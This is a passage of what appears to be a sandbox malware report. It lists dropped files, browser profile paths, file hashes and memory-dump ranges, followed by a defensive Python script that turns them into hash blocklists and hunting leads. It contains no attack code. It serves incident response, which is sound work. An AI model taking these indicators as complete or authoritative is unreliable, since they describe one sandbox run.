SHA256 8a0ca6866ec8eba35b72f86178f9ef958b2ad4a4471630324781ec72cf2babf3
SHA512 71f4c974b03a899deb84101e85bf5112db4e5c59f09addf854c90dd1e5ba2cab3d8014cd668900657e4ae6228459617cb412136e0b7a95fc76b7d1e8a565ca0c

memory/3144-1665-0x00000000057A0000-0x0000000005AF4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 d2303d182670507a56ef52e72937dd2e
SHA1 2fe438e399d0dc621ce59a23114dca8875ae86b0
SHA256 ca71e0255cf8cce40e65a86f4e96fab5e8593e30a183b38739276f02ceab96a8
SHA512 72520c5edc8bf3e904faeaeaa245a082c231b97a5e443973763117b325bc9aa65aaff287b9fba54b912b5c8d95d940418c0e569fa7a0b89f9568bda380945316

memory/3144-1628-0x00000000056C0000-0x0000000005726000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

MD5 7266db00c0486bc19357f7e9322e3605
SHA1 726fc4a7f529b7e3bf8b06e5288eff0813c5d23b
SHA256 b48a371936b11bec59a8848d78837e0f8da5a74746007f88b00819da84661010
SHA512 67534a7d83607dfe3b9ffa398b6c4551039860a27e9d35f2aacf28a4ea78f3c60c97d7f6ce9f44ff0ec37d57142000ca7d398a734d9395f2c47184b19473a78a

memory/3144-1709-0x0000000005DE0000-0x0000000005E2C000-memory.dmp

memory/3144-1702-0x0000000005DC0000-0x0000000005DDE000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

MD5 effaec199bfdce25de21a1f4612a9dec
SHA1 a110d73b5df5bd3418ea0e5d26c75edfc5c0c0e3
SHA256 f385c2cee37e68b46680c455b151be6200b35041e4432c5dc79800efa6eefdd2
SHA512 7f5a1ff06bb01e076b8d5756319c58b1efe54170dd3207b35316ed94a2533cfa4e96be6909dd4945564c6b974d55489cc0f3b9c35a4217aab8cb6b7ccfc3df1a
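The listing above is the report's raw record of what the sample wrote to disk and which process memory regions the sandbox dumped; in practice it gets turned into hash blocklists, file-path hunts and a carving plan. The script below does that as an added example (it is not part of the sandbox report or of any vendor tooling): it parses the path-then-hashes format, keeps the path-less SHA256 line this section opens with as an orphan instead of silently dropping it, flags paths that were recorded more than once with different hashes (the Edge Crashpad settings.dat entries above are one such pair) and reports the largest dumped region per PID. SAMPLE is an excerpt copied from the listing so it runs offline; every function name is this example's own.

```python
"""Turn the sandbox 'Files' listing above into hunting artifacts (added example,
not part of the original report). Format handled: a dropped-file path on its own
line, then MD5/SHA1/SHA256/SHA512 lines, interleaved with
memory/<pid>-<seq>-0x<start>-0x<end>-memory.dmp entries. SAMPLE is an excerpt copied
from the listing (plus its leading path-less SHA256 line); function names are this
example's own.
"""
import re
from collections import defaultdict

HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
_HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")
_MEM_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")

SAMPLE = r"""
SHA256 098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221
memory/2668-140-0x0000000000400000-0x0000000000429000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107260101\SvhQA35.exe
MD5 9da08b49cdcc4a84b4a722d1006c2af8
SHA1 7b5af0630b89bd2a19ae32aea30343330ca3a9eb
SHA256 215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd
SHA512 579dcb0c2f0af9a97a9c75caf023f375bd93f1698678393e7315360a33f432f2d727bf14b22c8b1584c628582115462bdd0c3edaacdcaec8fd691595e6b5bfdb
memory/4152-227-0x000002C5FF720000-0x000002C5FFC48000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe
MD5 0eb68c59eac29b84f81ad6522d396f59
SHA1 aacfdf3cb1bdd995f63584f31526b11874fc76a5
SHA256 dfa74d5d729e90be6e72b3c811a1299abbc52a1f6d347f011101fb5f719d059f
SHA512 81ee88577d9b665d90bc846aa249c9533aaeed2b7259d15981fcc1686723fe11343b682be25cfa3542117c8a805e40343a7315a69e7204829cbf70f22cca25e7
C:\ProgramData\a1vsr\8q9rieukn
MD5 a182561a527f929489bf4b8f74f65cd7
SHA1 8cd6866594759711ea1836e86a5b7ca64ee8911f
SHA256 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA512 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
MD5 1bed6483de34dd709e03fd3af839a76b
SHA1 3724a38c9e51fcce7955a59955d16bf68c083b92
SHA256 37a42554c291f46995b2487d08d80d94cefe6c7fb3cb4ae9c7c5e515d6b5e596
SHA512 264f6687ea8a8726b0000de1511b7b764b3d5a6f64946bb83a58effda42839e593de43865dafeeb89f5b78cc00d16f3979b417357fa2799ca0533bdf72f07fda
memory/2668-809-0x0000000000400000-0x0000000000429000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
MD5 fe6fb7ffeb0894d21284b11538e93bb4
SHA1 80c71bf18f3798129931b1781115bbef677f58f0
SHA256 e36c911b7dbea599da8ed437b46e86270ce5e0ac34af28ac343e22ecff991189
SHA512 3a8bd7b31352edd02202a7a8225973c10e3d10f924712bb3fffab3d8eea2d3d132f137518b5b5ad7ea1c03af20a7ab3ff96bd99ec460a16839330a5d2797753b
"""


def parse_listing(text):
    """Parse into {"files", "dumps", "orphans", "errors"}: a hash line seen before any
    path is kept as an orphan; a digest of the wrong length is logged, not fatal."""
    out = {"files": [], "dumps": [], "orphans": [], "errors": []}
    cur = None
    for line in (raw.strip() for raw in text.splitlines()):
        if not line:
            continue
        m = _MEM_RE.match(line)
        if m:
            start, end = int(m[3], 16), int(m[4], 16)
            out["dumps"].append({"pid": int(m[1]), "seq": int(m[2]), "start": start, "size": end - start})
            cur = None  # a dump entry closes the current file record
            continue
        m = _HASH_RE.match(line)
        if m:
            algo, digest = m[1], m[2].lower()
            if len(digest) != HASH_LEN[algo]:
                out["errors"].append(f"{algo} digest has {len(digest)} hex chars: {line}")
            elif cur is None:
                out["orphans"].append(line)
            else:
                cur[algo] = digest
            continue
        cur = {"path": line}  # any other non-empty line opens a new file record
        out["files"].append(cur)
    return out


def rewritten_paths(files):
    """Paths recorded more than once with different SHA256 values: the file was
    overwritten during the run (the Edge Crashpad settings.dat above is one)."""
    seen = defaultdict(set)
    for f in files:
        if "SHA256" in f:
            seen[f["path"]].add(f["SHA256"])
    return {p: sorted(h) for p, h in seen.items() if len(h) > 1}


def dropped_executables(files):
    """PE-style drops (.exe/.dll/.pyd) under AppData or ProgramData. Extension-less
    drops such as the ProgramData a1vsr files are deliberately left to manual review."""
    return [f["path"] for f in files
            if f["path"].lower().endswith((".exe", ".dll", ".pyd"))
            and any(r in f["path"].lower() for r in ("\\appdata\\", "\\programdata\\"))]


def largest_dump_per_pid(dumps):
    """Largest captured region per PID; a 0x400000 start is the default 32-bit PE image base."""
    best = {}
    for d in dumps:
        if d["pid"] not in best or d["size"] > best[d["pid"]]["size"]:
            best[d["pid"]] = d
    return best
```

Feed the whole Files section to parse_listing instead of SAMPLE to get the full set: the SHA256 values of dropped_executables are the blocklist, rewritten_paths shows which artifacts the sample (or the browser it drove) touched more than once, and largest_dump_per_pid tells you where to start carving, since PID 2668's repeatedly dumped 0x400000-0x429000 range sits at the default image base of a 32-bit PE.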